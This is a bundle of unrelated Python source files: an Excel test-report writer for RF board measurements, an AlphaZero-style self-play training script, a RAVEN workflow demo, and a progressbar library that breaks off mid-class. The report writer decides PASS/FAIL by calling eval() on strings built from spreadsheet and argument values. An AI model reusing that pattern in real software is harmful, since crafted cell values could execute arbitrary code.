logger.error('write ACPR error:{}'.format(e))
else:
self.wb.save()
def set_ACPR_colusition(self, lst, nlst):
'''
多个值,一个结果
:param lst:
:param nlst:
:return:
'''
try:
if nlst is None:
return None
indicator1 = None
indicator2 = None
con_list = []
new_norm = [float(re.findall(r'-?\d+\.?\d*e?-?\d*?', str(item))[0])
if item is not None else None for
item in nlst]
if new_norm[0] is not None:
indicator1 = '>=' + str(new_norm[0])
if new_norm[2] is not None:
indicator2 = '<=' + str(new_norm[2])
for item in lst:
if indicator1 and indicator2:
e1 = str(item) + indicator1
e2 = str(item) + indicator2
if eval(e1) and eval(e2):
con_list.append('PASS')
else:
con_list.append('FAIL')
elif indicator1:
e1 = str(item) + indicator1
if eval(e1):
con_list.append('PASS')
else:
return 'FAIL'
elif indicator2:
e1 = str(item) + indicator2
if eval(e1):
con_list.append('PASS')
else:
return 'FAIL'
if not con_list:
return None
return 'PASS' if all(con_list) else 'FAIL'
except Exception as e:
logger.error('set_acpr_conclusion error:{}'.format(e))
return None
def get_norm(self, shtname, startrow):
'''
读取ACPR的指标规范
:return:[下限,标准值,上限]
'''
try:
sht = self.wb.sheets(shtname)
dt = sht.range('C{}:E{}'.format(startrow, startrow)).value
return dt
except Exception as e:
logger.exception('get_norm error:{}'.format(e))
return None
def write_ccdf(self, temp=1, **kwargs):
'''
{'B41':[(ppm,crest factor),(ppm,crest factor),(ppm,crest factor)]}
:return:
'''
logger.debug('write_ccdf={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
ppm_rows = self.dl_rows['频偏测试']
cf_rows = self.dl_rows['峰均比测试']
temp_rows = [['F', 'G'], ['H', 'I'], ['J', 'K']] # 低温,常温,高温所在列
value_row_base, norm_row_base = temp_rows[int(temp)] # 常温结果所在列,常温结论所在列
ppm_row_dict = self.get_each_cellband_row(shtname, ppm_rows[0], ppm_rows[1])
cf_row_dict = self.get_each_cellband_row(shtname, cf_rows[0], cf_rows[1])
ppm_norm = self.get_norm(shtname, ppm_rows[0] + self.jump_row) # 指标
cf_norm = self.get_norm(shtname, cf_rows[0] + self.jump_row) # 指标
for key, item in kwargs.items():
ppm_row_range = value_row_base + str(ppm_row_dict[str(key).upper()])
cf_row_range = value_row_base + str(cf_row_dict[str(key).upper()])
ppm_pass_range = norm_row_base + str(ppm_row_dict[str(key).upper()])
cf_pass_range = norm_row_base + str(cf_row_dict[str(key).upper()])
lst1 = []
lst2 = []
ppm_lst = []
cf_lst = []
for each in item:
if each is None:
lst1.append('')
lst2.append('')
ppm_lst.append('')
cf_lst.append('')
continue
ppm, cf = each
ppm_lst.append(self.set_ccdf_colusition(ppm, ppm_norm))
cf_lst.append(self.set_ccdf_colusition(cf, cf_norm))
lst1.append('{}'.format(ppm))
lst2.append('{}'.format(cf))
sht.range('{}'.format(ppm_row_range)).options(transpose=True).value = lst1
sht.range('{}'.format(cf_row_range)).options(transpose=True).value = lst2
sht.range('{}'.format(ppm_pass_range)).options(transpose=True).value = ppm_lst # 写结论
sht.range('{}'.format(cf_pass_range)).options(transpose=True).value = cf_lst # 写结论
except Exception as e:
logger.error('write ccdf error:{}'.format(e))
else:
self.wb.save()
def set_ccdf_colusition(self, ppm, norm_list):
'''
单个值满足上下限
:param ppm: ppm/crest factor
:param norm_list:[下限,标准值,上限]
:return:
'''
try:
if ppm is None:
return 'FAIL'
if norm_list is None:
return ''
flag_lst = []
new_norm = [float(re.findall(r'-?\d+\.?\d*e?-?\d*?', str(item))[0])
if item is not None else None for
item in norm_list]
if new_norm[0] is not None:
indicator = '>='
if indicator:
e1 = str(ppm) + indicator + str(new_norm[0])
if eval(e1):
flag_lst.append(True)
else:
return 'FAIL'
if new_norm[2] is not None:
indicator = '<='
if indicator:
e1 = str(ppm) + indicator + str(new_norm[2])
if eval(e1):
flag_lst.append(True)
else:
return 'FAIL'
if not flag_lst:
return ''
return 'PASS' if all(flag_lst) else 'FAIL'
except Exception as e:
logger.exception(e)
return ''
def write_EVM(self, temp=1, **kwargs):
'''
:return:
'''
logger.debug('write_EVM_dict={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
evm_rows = self.dl_rows['EVM测试']
temp_rows = [['F', 'G'], ['H', 'I'], ['J', 'K']] # 低温,常温,高温所在列
value_row_base, norm_row_base = temp_rows[int(temp)] # 常温结果所在列,常温结论所在列
row_dict = self.get_each_cellband_row(shtname, evm_rows[0], evm_rows[1])
norm_list = self.get_norm(shtname, evm_rows[0] + self.jump_row)
for key, item in kwargs.items():
evm_range = value_row_base + str(row_dict[str(key).upper()])
evm_pass_range = norm_row_base + str(row_dict[str(key).upper()])
pass_lst = []
for evm_value in item:
pass_lst.append(self.set_ccdf_colusition(evm_value, norm_list))
sht.range('{}'.format(evm_range)).options(transpose=True).value = item
sht.range('{}'.format(evm_pass_range)).options(transpose=True).value = pass_lst
except Exception as e:
logger.error('write EVM error:{}'.format(e))
else:
self.wb.save()
def write_powerspectrum(self, temp=1, **kwargs):
'''
:return:
'''
logger.debug('write_powerspectrum={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
rows = self.dl_rows['占用带宽测试']
temp_rows = [['F', 'G'], ['H', 'I'], ['J', 'K']] # 低温,常温,高温所在列
value_row_base, norm_row_base = temp_rows[int(temp)] # 常温结果所在列,常温结论所在列
row_dict = self.get_each_cellband_row(shtname, rows[0], rows[1])
norm_list = self.get_norm(shtname, rows[0] + self.jump_row)
for key, item in kwargs.items():
ps_range = value_row_base + str(row_dict[str(key).upper()])
ps_pass_range = norm_row_base + str(row_dict[str(key).upper()])
pass_lst = []
for ps_value in item:
pass_lst.append(self.set_ccdf_colusition(ps_value, norm_list))
sht.range('{}'.format(ps_range)).options(transpose=True).value = item
sht.range('{}'.format(ps_pass_range)).options(transpose=True).value = pass_lst
except Exception as e:
logger.error('write_powerspectrum error:{}'.format(e))
else:
self.wb.save()
def write_txatt_conclusion(self, temp=1):
'''
temp:0:低温,1:常温,2:高温
更新输出功率,带内波动,Tx可调精度的 结论
:return:
'''
try:
power_row = self.dl_rows['输出功率测试'] # 输出功率和结论列
ripple_row = self.dl_rows['带内波动测试'] # 带内波动的记录值和结论
gear_row = self.dl_rows['可调精度测试'] # ['H60:H74', 'I60:I74']
temp_rows = [['F', 'H', 'F', 'G', 'F', 'G'], ['I', 'K', 'H', 'I', 'H', 'I'], ['L', 'N', 'J', 'K', 'J', 'K']]
power_row_base, power_con_base, ripple_row_base, ripple_con_base, gear_row_base, gear_con_base = temp_rows[
int(temp)]
shtname = BoardExcel.sheets_name[0]
sht = self.wb.sheets(shtname)
power_list = sht.range(
'{}{}:{}{}'.format(power_row_base, power_row[0] + 3, power_row_base, power_row[1])).value
power_norm_dict = self.get_norm(shtname, power_row[0] + self.jump_row)
power_con_list = self.set_power_conclusion(power_list, power_norm_dict) # 输出功率结论
sht.range('{}{}:{}{}'.format(power_con_base, power_row[0] + 3, power_con_base, power_row[1])).options(
transpose=True).value = power_con_list
ripple_list = sht.range(
'{}{}:{}{}'.format(ripple_row_base, ripple_row[0] + 3, ripple_row_base, ripple_row[1])).value # 带内波动
ripple_norm_list = self.get_norm(shtname, ripple_row[0] + self.jump_row)
ripple_con_list = self.set_power_conclusion(ripple_list, ripple_norm_list)
sht.range('{}{}:{}{}'.format(ripple_con_base, ripple_row[0] + 3, ripple_con_base, ripple_row[1])).options(
transpose=True).value = ripple_con_list # 带内波动结论
gear_list = sht.range(
'{}{}:{}{}'.format(gear_row_base, gear_row[0] + 3, gear_row_base, gear_row[1])).value # 可调精度
gear_norm_list = self.get_norm(shtname, gear_row[0] + self.jump_row)
gear_con_list = self.set_power_conclusion(gear_list, gear_norm_list)
sht.range('{}{}:{}{}'.format(gear_con_base, gear_row[0] + 3, gear_con_base, gear_row[1])).options(
transpose=True).value = gear_con_list
except Exception as e:
logger.error('write_txatt_conclusion error:{}'.format(e))
else:
self.wb.save()
def set_power_conclusion(self, power_list, norm_dict):
try:
indicator1 = None
indicator2 = None
con_list = []
for key, item in norm_dict.items():
value = float(re.findall(r'-?\d+\.?\d*e?-?\d*?', str(item))[0]) if item is not None else None
if value is None:
continue
if '上限' in key:
indicator1 = '<=' + str(value)
elif '下限' in key:
indicator2 = '>=' + str(value)
for power in power_list:
if indicator1 and indicator2:
e1 = str(power) + indicator1
e2 = str(power) + indicator2
if eval(e1) and eval(e2):
con_list.append('PASS')
else:
con_list.append('FAIL')
elif indicator1:
e1 = str(power) + indicator1
if eval(e1):
con_list.append('PASS')
else:
con_list.append('FAIL')
elif indicator2:
e1 = str(power) + indicator2
if eval(e1):
con_list.append('PASS')
else:
con_list.append('FAIL')
return con_list
except Exception as e:
logger.error('set_power_conclusion error:{}'.format(e))
return None
def write_DANL(self, temp=1, **kwargs):
'''
底噪
:param kwargs:
:return:
'''
logger.debug('write_DANL_dict={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
danl_rows = self.dl_rows['底噪测试']
temp_rows = [['F', 'G'], ['H', 'I'], ['J', 'K']] # 低温,常温,高温所在列
value_row_base, norm_row_base = temp_rows[int(temp)] # 常温结果所在列,常温结论所在列
row_dict = self.get_each_cellband_row(shtname, danl_rows[0], danl_rows[1])
norm_list = self.get_norm(shtname, danl_rows[0] + self.jump_row)
for key, item in kwargs.items():
danl_range = value_row_base + str(row_dict[str(key).upper()])
danl_pass_range = norm_row_base + str(row_dict[str(key).upper()])
pass_lst = []
for danl_value in item:
pass_lst.append(self.set_ccdf_colusition(danl_value, norm_list))
sht.range('{}'.format(danl_range)).options(transpose=True).value = item
sht.range('{}'.format(danl_pass_range)).options(transpose=True).value = pass_lst
except Exception as e:
logger.error('write EVM error:{}'.format(e))
else:
self.wb.save()
def write_current(self, temp=1, **kwargs):
'''
工作电流
:param kwargs:
:return:
'''
logger.debug('write_current_dict={}'.format(kwargs))
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
cur_rows = self.dl_rows['工作电流测试']
temp_rows = [['F', 'G'], ['H', 'I'], ['J', 'K']] # 低温,常温,高温所在列
value_row_base, norm_row_base = temp_rows[int(temp)] # 常温结果所在列,常温结论所在列
row_dict = self.get_each_cellband_row(shtname, cur_rows[0], cur_rows[1])
norm_list = self.get_norm(shtname, cur_rows[0] + self.jump_row)
for key, item in kwargs.items():
cur_range = value_row_base + str(row_dict[str(key).upper()])
cur_pass_range = norm_row_base + str(row_dict[str(key).upper()])
pass_lst = []
for cur_value in item:
pass_lst.append(self.set_ccdf_colusition(cur_value, norm_list))
sht.range('{}'.format(cur_range)).options(transpose=True).value = item
sht.range('{}'.format(cur_pass_range)).options(transpose=True).value = pass_lst
except Exception as e:
logger.error('write_current error:{}'.format(e))
else:
self.wb.save()
def close_file(self):
try:
if hasattr(self, 'wb'):
self.wb.close()
del self.wb
if hasattr(self, 'app'):
self.app.quit()
del self.app
# logger.debug('close excel..')
except Exception as e:
logger.error('{}'.format(e))
if __name__ == '__main__':
xel = BoardExcel()
xel.open_excel('EB2.xlsx')
# df = xel.get_band_para()
xel.get_dl_rows()
# xel.get_normaltemp_level_rows()
# print(df['中', '频点'].apply(lambda x: int(x))) # 返回Series
# s1 = df.loc['B41', (slice(None), '频点')] # series
# print(s1.values) # list
# dt=xel.get_txatt_norm()
# print(dt)
# 3.
# dt = {'cell0_E': [
# ['0.61', '-0.15', '-0.33', '-0.25', '-0.53', '1.53', '0.69', '1.23', '1.24',
# '1.26', '1.17', '1.39', '0.64',
# '1.26', '-0.34', '-0.27', '1.05', '-0.01', '1.43', '-0.46'],
# ['1.56', '-0.04', '0.73', '0.77', '0.80', '1.15', '0.48', '0.98', '0.95', '0.80', '-0.96', '0.83', '1.10',
# '-0.53', '1.76', '-0.84', '0.14', '0.38', '-0.85', '0.28'],
# ['0.61', '0.48', '-1.23', '0.64', '-0.89', '-0.59', '1.41', '0.60', '-1.18', '-1.01', '0.59', '0.41', '1.20',
# '0.52', '0.36', '-0.69', '-1.17', '-0.82', '-0.97', '-1.23']]}
#
# xel.write_power_range(**dt)
# 4.
# dt = {'cell0_E': [(0,-1,-25,-35),(0,-1.2,-20,-30)]}
# xel.write_ACPR(**dt)
# 5.
# dt = {'cell0_e': [(0, -1), (1, -2), (2, -3)]}
# xel.write_ccdf(**dt)
# print(xel.get_ACPR_norm())
# 6.
# xel.write_EVM(**{'cell0_E':[11, 1.09, 1.13]})
# 7.
# xel.write_powerspectrum(**{'cell0_E': [11, 4.6, 4.5]})
# xel.close_file()
# a = xel.get_normaltemp_level_rows()
# a=xel.get_txatt_norm()
# 1.
# a=xel.get_max_row_in_temp('cell1_b1')
# print(a)
# 2.
xel.get_set_condition('0')
dt = {'cell0_E': [[23, 7, -1, -1]]}
xel.write_max_txatt(**dt)
dt = {'cell0_E': [11, 22, 33.8]}
xel.write_cali(**dt)
xel.write_bbver_sn('123', '456')
# xel.write_txatt_conclusion()
# 4.
# xel.write_current(**{'cell0_E': [1.4, 1.09, 1.13]})
xel.close_file()
|
import numpy as np
from nn.nn import NN
from config import config
from mcts import UCTPlayGame
import cPickle as pickle
import os
if __name__ == "__main__":
""" Play a single game to the end using UCT for both players.
"""
nn = NN(config)
nn.setup()
pickle.dump(config, open(os.path.join(config.save_path, 'config.pkl'), 'wb'), pickle.HIGHEST_PROTOCOL)
batch_data = {}
batch_data['s'], batch_data['pi'], batch_data['z'] = ([], [], [])
data_path = os.path.join(config.save_path, 'batch_data_iter_{}.pkl')
data_paths = sorted([path for path in os.listdir(config.save_path) if 'batch_data_iter_' in path])
if data_paths != []:
batch_data = pickle.load(open(os.path.join(config.save_path, data_paths[-1]), "rb"))
for k in batch_data.keys(): # remove oldest 25% from buffer
batch_data[k] = batch_data[k][int(0.25*config.buffer_size):]
for iteration in range(config.eval_freq):
# Collect self-play data from MCTS
while len(batch_data['s']) < config.buffer_size:
if config.verbose:
print('Current data size: {}'.format(len(batch_data['s'])))
data = UCTPlayGame(nn)
for k in batch_data.keys():
batch_data[k].extend(data[k])
print "Finished collecting self-play data from iteration %d" % iteration
nn.train((batch_data['s'], batch_data['pi'], batch_data['z']))
print "Saving batch data..."
fn = data_path.format(iteration)
pickle.dump(batch_data, open(fn, 'wb'), pickle.HIGHEST_PROTOCOL)
print "Done saving {}".format(fn)
print "Finished training on self-play data from iteration %d" % iteration
for k in batch_data.keys(): # remove oldest 25% from buffer
batch_data[k] = batch_data[k][int(0.25*config.buffer_size):]
|
from .knn import NNClassifier
from .sklearn import SKLearnKnnClassifier, SKLearnSVMClassifier
|
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Demonstrate running RAVEN in Python workflows.
Created on Nov 3, 2021
@author: aalfonsi
"""
import os
import sys
import matplotlib.pyplot as plt
# note: we use this complicated way to find RAVEN because we don't know how RAVEN
# is installed on specific machines; it can be simplified greatly for specific applications
frameworkDir = os.path.abspath(os.path.join(*([os.path.dirname(__file__)]+[os.pardir]*3+['framework'])))
sys.path.append(frameworkDir)
thisDir = os.path.abspath(os.path.dirname(__file__))
frameworkTestDir = os.path.abspath(os.path.join(frameworkDir, '../tests', 'framework'))
targetWorkflow = os.path.join(frameworkTestDir, 'test_rom_trainer.xml')
# import Driver for now
import Driver
# import simulation
from Simulation import Simulation as sim
import utils.TreeStructure as TS
# instantiate a RAVEN simulation instance
# we simply instanciate a Simulation instance
ravenSim = sim(frameworkDir, verbosity="all")
# set input files (this can be encapsulated in a method in simulation (together with the XML reader)
ravenSim.setInputFiles([targetWorkflow])
# read tree (XML input)
tree = TS.parse(open(targetWorkflow,'r'))
# read entities (this part can be encapsulated in a simulation method)
ravenSim.XMLpreprocess(tree.getroot(),os.path.dirname(os.path.abspath(targetWorkflow)))
ravenSim.XMLread(tree.getroot(),runInfoSkip=set(["DefaultInputFile"]),xmlFilename=targetWorkflow)
# ready to initiate the simulation
ravenSim.initialize()
# now there are 2 options
# either we run the full simulation using the simulation run
# or we run a step at the time (to actually interact with the simulation)
# lets follow the second approach since the first approach would be
# simply : ravenSim.run()
# get all steps
allSteps = ravenSim.stepSequence()
for name in allSteps:
inputs, step = ravenSim.initiateStep(name)
#running a step
ravenSim.executeStep(inputs, step)
if name == 'test_extract_for_rom_trainer':
# acquire and plot data from a data object while we are running the step
ps = ravenSim.getEntity('DataObjects', 'Pointset_from_database_for_rom_trainer')
data = ps.asDataset()# see xarray docs
data.plot.scatter(x="DeltaTimeScramToAux", y="DG1recoveryTime", hue="CladTempThreshold")
# these will be saved in the working directory set by RAVEN (e.g. ./tests/framework/test_rom_trainer/)
plt.savefig(os.path.join(thisDir,"firstplot.png"))
data.plot.scatter(x="DeltaTimeScramToAux", y="CladTempThreshold", hue="DG1recoveryTime")
plt.savefig(os.path.join(thisDir,"secondplot.png"))
# modify the data before going in the rom trainer
data['DeltaTimeScramToAux']*=1.01
# finalize the simulation
ravenSim.finalizeSimulation()
|
from __future__ import division, absolute_import, with_statement
import io
import sys
import math
import logging
import warnings
from datetime import datetime, timedelta
import collections
from . import widgets
from . import widgets as widgets_module # Avoid name collision
from . import six
from . import utils
from . import base
logger = logging.getLogger()
class ProgressBarMixinBase(object):
def __init__(self, **kwargs):
pass
def start(self, **kwargs):
pass
def update(self, value=None):
pass
def finish(self): # pragma: no cover
pass
class ProgressBarBase(collections.Iterable, ProgressBarMixinBase):
pass
class DefaultFdMixin(ProgressBarMixinBase):
def __init__(self, fd=sys.stderr, **kwargs):
self.fd = fd
ProgressBarMixinBase.__init__(self, **kwargs)
def update(self, *args, **kwargs):
ProgressBarMixinBase.update(self, *args, **kwargs)
self.fd.write('\r' + self._format_line())
def finish(self, *args, **kwargs): # pragma: no cover
ProgressBarMixinBase.finish(self, *args, **kwargs)
self.fd.write('\n')
class ResizableMixin(ProgressBarMixinBase):
def __init__(self, term_width=None, **kwargs):
ProgressBarMixinBase.__init__(self, **kwargs)
self.signal_set = False
if term_width:
self.term_width = term_width
else:
try:
self._handle_resize()
import signal
self._prev_handle = signal.getsignal(signal.SIGWINCH)
signal.signal(signal.SIGWINCH, self._handle_resize)
self.signal_set = True
except Exception: # pragma: no cover
pass
def _handle_resize(self, signum=None, frame=None):
'Tries to catch resize signals sent from the terminal.'
w, h = utils.get_terminal_size()
self.term_width = w
def finish(self): # pragma: no cover
ProgressBarMixinBase.finish(self)
if self.signal_set:
try:
import signal
signal.signal(signal.SIGWINCH, self._prev_handle)
except Exception: # pragma no cover
pass
class StdRedirectMixin(DefaultFdMixin):
def __init__(self, redirect_stderr=False, redirect_stdout=False, **kwargs):
DefaultFdMixin.__init__(self, **kwargs)
self.redirect_stderr = redirect_stderr
self.redirect_stdout = redirect_stdout
self._stdout = self.stdout = sys.stdout
self._stderr = self.stderr = sys.stderr
def start(self, *args, **kwargs):
self.stderr = self._stderr = sys.stderr
if self.redirect_stderr:
self.stderr = sys.stderr = six.StringIO()
self.stdout = self._stdout = sys.stdout
if self.redirect_stdout:
self.stdout = sys.stdout = six.StringIO()
DefaultFdMixin.start(self, *args, **kwargs)
def update(self, value=None):
try:
if self.redirect_stderr and sys.stderr.tell():
self.fd.write('\r' + ' ' * self.term_width + '\r')
# Not atomic unfortunately, but writing to the same stream
# from multiple threads is a bad idea anyhow
self._stderr.write(sys.stderr.getvalue())
sys.stderr.seek(0)
sys.stderr.truncate(0)
self._stderr.flush()
except (io.UnsupportedOperation, AttributeError): # pragma: no cover
logger.warn('Disabling stderr redirection, %r is not seekable',
sys.stderr)
self.redirect_stderr = False
try:
if self.redirect_stdout and sys.stdout.tell():
self.fd.write('\r' + ' ' * self.term_width + '\r')
# Not atomic unfortunately, but writing to the same stream
# from multiple threads is a bad idea anyhow
self._stdout.write(sys.stdout.getvalue())
sys.stdout.seek(0)
sys.stdout.truncate(0)
self._stdout.flush()
except (io.UnsupportedOperation, AttributeError): # pragma: no cover
logger.warn('Disabling stdout redirection, %r is not seekable',
sys.stdout)
self.redirect_stdout = False
DefaultFdMixin.update(self, value=value)
def finish(self):
DefaultFdMixin.finish(self)
if self.redirect_stderr and hasattr(sys.stderr, 'getvalue'):
self._stderr.write(sys.stderr.getvalue())
self.stderr = sys.stderr = self._stderr
if self.redirect_stdout and hasattr(sys.stdout, 'getvalue'):
self._stdout.write(sys.stdout.getvalue())
self.stdout = sys.stdout = self._stdout
class ProgressBar(StdRedirectMixin, ResizableMixin, ProgressBarBase):
'''The ProgressBar class which updates and prints the bar.
A common way of using it is like:
>>> progress = ProgressBar().start()
>>> for i in range(100):
... progress.update(i+1)
... # do something
...
>>> progress.finish()
You can also use a ProgressBar as an iterator:
>>> progress = ProgressBar()
>>> some_iterable = range(100)
>>> for i in progress(some_iterable):
... # do something
... pass
...
Since the progress bar is incredibly customizable you can specify
different widgets of any type in any order. You can even write your own
widgets! However, since there are already a good number of widgets you
should probably play around with them before moving on to create your own
widgets.
The term_width parameter represents the current terminal width. If the
parameter is set to an integer then the progress bar will use that,
otherwise it will attempt to determine the terminal width falling back to
80 columns if the width cannot be determined.
When implementing a widget's update method you are passed a reference to
the current progress bar. As a result, you have access to the
ProgressBar's methods and attributes. Although there is nothing preventing
you from changing the ProgressBar you should treat it as read only.
Useful methods and attributes include (Public API):
- value: current progress (min_value <= value <= max_value)
- max_value: maximum (and final) value
- finished: True if the bar has finished (reached 100%)
- start_time: the time when start() method of ProgressBar was called
- seconds_elapsed: seconds elapsed since start_time and last call to
update
'''
_DEFAULT_MAXVAL = 100
def __init__(self, min_value=0, max_value=None, widgets=None,
left_justify=True, initial_value=0, poll_interval=None,
widget_kwargs=None,
**kwargs):
'''Initializes a progress bar with sane defaults'''
StdRedirectMixin.__init__(self, **kwargs)
ResizableMixin.__init__(self, **kwargs)
ProgressBarBase.__init__(self, **kwargs)
if not max_value and kwargs.get('maxval'):
warnings.warn('The usage of `maxval` is deprecated, please use '
'`max_value` instead', DeprecationWarning)
max_value = kwargs.get('maxval')
if not poll_interval and kwargs.get('poll'):
warnings.warn('The usage of `poll` is deprecated, please use '
'`poll_interval` instead', DeprecationWarning)
poll_interval = kwargs.get('poll')
if max_value:
if min_value > max_value:
raise ValueError('Max value needs to be bigger than the min '
'value')
self.min_value = min_value
self.max_value = max_value
self.widgets = widgets
self.widget_kwargs = widget_kwargs or {}
self.left_justify = left_justify
self._iterable = None
self.previous_value = None
self.value = initial_value
self.last_update_time = None
self.start_time = None
self.updates = 0
self.end_time = None
self.extra = dict()
if poll_interval and isinstance(poll_interval, (int, float)):
poll_interval = timedelta(seconds=poll_interval)
self.poll_interval = poll_interval
# A dictionary of names of DynamicMessage's
self.dynamic_messages = {}
for widget in (self.widgets or []):
if isinstance(widget, widgets_module.DynamicMessage):
self.dynamic_messages[widget.name] = None
@property
def percentage(self):
'''Return current percentage, returns None if no max_value is given
>>> progress = ProgressBar()
>>> progress.max_value = 10
>>> progress.min_value = 0
>>> progress.value = 0
>>> progress.percentage
0.0
>>>
>>> progress.value = 1
>>> progress.percentage
10.0
>>> progress.value = 10
>>> progress.percentage
100.0
>>> progress.min_value = -10
>>> progress.percentage
100.0
>>> progress.value = 0
>>> progress.percentage
50.0
>>> progress.value = 5
>>> progress.percentage
75.0
>>> progress.value = -5
>>> progress.percentage
25.0
>>> progress.max_value = None
>>> progress.percentage
'''
if self.max_value is None or self.max_value is base.UnknownLength:
return None
elif self.max_value:
todo = self.value - self.min_value
total = self.max_value - self.min_value
percentage = todo / total
else:
percentage = 1
return percentage * 100
def data(self):
'''
Variables available:
- max_value: The maximum value (can be None with iterators)
- value: The current value
- total_seconds_elapsed: The seconds since the bar started
- seconds_elapsed: The seconds since the bar started modulo 60
- minutes_elapsed: The minutes since the bar started modulo 60
- hours_elapsed: The hours since the bar started modulo 24
- days_elapsed: The hours since the bar started
- time_elapsed: Shortcut for HH:MM:SS time since the bar started
including days
- percentage: Percentage as a float
- dynamic_messages: A dictionary of user-defined DynamicMessage's
'''
self.last_update_time = datetime.now()
elapsed = self.last_update_time - self.start_time
# For Python 2.7 and higher we have _`timedelta.total_seconds`, but we
# want to support older versions as well
total_seconds_elapsed = utils.timedelta_to_seconds(elapsed)
return dict(
# The maximum value (can be None with iterators)
max_value=self.max_value,
# Start time of the widget
start_time=self.start_time,
# Last update time of the widget
last_update_time=self.last_update_time,
# End time of the widget
end_time=self.end_time,
# The current value
value=self.value,
# The previous value
previous_value=self.previous_value,
# The total update count
updates=self.updates,
# The seconds since the bar started
total_seconds_elapsed=total_seconds_elapsed,
# The seconds since the bar started modulo 60
seconds_elapsed=(elapsed.seconds % 60) +
(elapsed.microseconds / 1000000.),
# The minutes since the bar started modulo 60
minutes_elapsed=(elapsed.seconds / 60) % 60,
# The hours since the bar started modulo 24
hours_elapsed=(elapsed.seconds / (60 * 60)) % 24,
# The hours since the bar started
days_elapsed=(elapsed.seconds / (60 * 60 * 24)),
# The raw elapsed `datetime.timedelta` object
time_elapsed=elapsed,
# Percentage as a float or `None` if no max_value is available
percentage=self.percentage,
# Dictionary of DynamicMessage's
dynamic_messages=self.dynamic_messages
)
def default_widgets(self):
if self.max_value:
return [
widgets.Percentage(**self.widget_kwargs),
' (', widgets.SimpleProgress(**self.widget_kwargs), ')',
' ', widgets.Bar(**self.widget_kwargs),
' ', widgets.Timer(**self.widget_kwargs),
' ', widgets.AdaptiveETA(**self.widget_kwargs),
]
else:
return [
widgets.AnimatedMarker(**self.widget_kwargs),
' ', widgets.Counter(**self.widget_kwargs),
' ', widgets.Timer(**self.widget_kwargs),
]
def __call__(self, iterable, max_value=None):
'Use a ProgressBar to iterate through an iterable'
if max_value is None:
try:
self.max_value = len(iterable)
except TypeError:
if self.max_value is None:
self.max_value = base.UnknownLength
else:
self.max_value = max_value
self._iterable = iter(iterable)
return self
def __iter__(self):
return self
def __next__(self):
try:
value = next(self._iterable)
if self.start_time is None:
self.start()
else:
self.update(self.value + 1)
return value
except StopIteration:
self.finish()
raise
def __exit__(self, exc_type, exc_value, traceback):
self.finish()
def __enter__(self):
return self.start()
# Create an alias so that Python 2.x won't complain about not being
# an iterator.
next = __next__
def __iadd__(self, value):
'Updates the ProgressBar by adding a new value.'
self.update(self.value + value)
return self
def _format_widgets(self):
result = []
expanding = []
width = self.term_width
data = self.data()
for index, widget in enumerate(self.widgets):
if isinstance(widget, widgets.AutoWidthWidgetBase):
result.append(widget)
expanding.insert(0, index)
elif isinstance(widget, six.basestring):
result.append(widget)
width -= len(widget)
else:
widget_output = widget(self, data)
result.append(widget_output)
width -= len(widget_output)
count = len(expanding)
while expanding:
portion = max(int(math.ceil(width * 1. / count)), 0)
index = expanding.pop()
widget = result[index]
count -= 1
widget_output = widget(self, data, portion)
width -= len(widget_output)
result[index] = widget_output
return result
def _format_line(self):
'Joins the widgets and justifies the line'
widgets = ''.join(self._format_widgets())
if self.left_justify:
return widgets.ljust(self.term_width)
else:
return widgets.rjust(self.term_width)
def _needs_update(self):
'Returns whether the ProgressBar should redraw the line.'
if self.poll_interval:
delta = datetime.now() - self.last_update_time
poll_status = delta > self.poll_interval
else:
poll_status = False
# Do not update if value increment is not large enough to
# add more bars to progressbar (according to current
# terminal width)
try:
divisor = self.max_value / self.term_width # float division
if self.value // divisor == self.previous_value // divisor:
return poll_status or self.end_time
except Exception:
# ignore any division errors
pass
return self.value > self.next_update or poll_status or self.end_time
def update(self, value=None, force=False, **kwargs):
'Updates the ProgressBar to a new value.'
if self.start_time is None:
self.start()
return self.update(value)
# Save the updated values for dynamic messages
for key in kwargs:
if key in self.dynamic_messages:
self.dynamic_messages[key] = kwargs[key]
else:
raise TypeError(
'update() got an unexpected keyword ' +
'argument \'{}\''.format(key))
if value is not None and value is not base.UnknownLength:
if self.max_value is base.UnknownLength:
# Can't compare against unknown lengths so just update
pass
elif self.min_value <= value <= self.max_value:
# Correct value, let's accept
pass
else:
raise ValueError(
'Value out of range, should be between %s and %s'
% (self.min_value, self.max_value))
self.previous_value = self.value
self.value = value
if self._needs_update() or force:
self.updates += 1
ResizableMixin.update(self, value=value)
ProgressBarBase.update(self, value=value)
StdRedirectMixin.update(self, value=value)
def start(self, max_value=None):
'''Starts measuring time, and prints the bar at 0%.
It returns self so you can use it like this:
>>> pbar = ProgressBar().start()
>>> for i in range(100):
... # do something
... pbar.update(i+1)
...
>>> pbar.finish()
'''
StdRedirectMixin.start(self, max_value=max_value)
ResizableMixin.start(self, max_value=max_value)
ProgressBarBase.start(self, max_value=max_value)
self.max_value = max_value or self.max_value
if self.max_value is None:
self.max_value = self._DEFAULT_MAXVAL
# Constructing the default widgets is only done when we know max_value
if self.widgets is None:
self.widgets = self.default_widgets()
for widget in self.widgets:
interval = getattr(widget, 'INTERVAL', None)
if interval is not None:
self.poll_interval = min(
self.poll_interval or interval,
interval,
)
self.num_intervals = max(100, self.term_width)
self.next_update = 0
if self.max_value is not base.UnknownLength:
if self.max_value < 0:
raise ValueError('Value out of range')
self.update_interval = self.max_value / self.num_intervals
self.start_time = self.last_update_time = datetime.now()
self.update(self.min_value, force=True)
return self
def finish(self):
'Puts the ProgressBar bar in the finished state.'
self.end_time = datetime.now()
self.update(self.max_value)
StdRedirectMixin.finish(self)
ResizableMixin.finish(self)
ProgressBarBase.finish(self)
class DataTransferBar(ProgressBar):
'''A progress bar with sensible defaults for downloads etc.
